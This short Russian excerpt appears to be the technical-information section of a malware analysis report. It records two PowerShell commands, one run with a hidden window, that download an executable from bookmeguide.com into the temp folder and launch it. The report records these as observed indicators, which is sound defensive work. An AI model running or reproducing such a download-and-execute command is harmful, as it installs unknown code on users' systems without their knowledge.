Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = $env:temp + '\DRNpGxHWR.exe';WGet 'http://bookmeguide.com/Mceinre.exe' -outFiLe $a;start $a
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = $env:temp + '\DRNpGxHWR.exe';WGet 'http://bookmeguide.com/Mceinre.exe' -outFiLe $a;start $a' (со скрытым окном)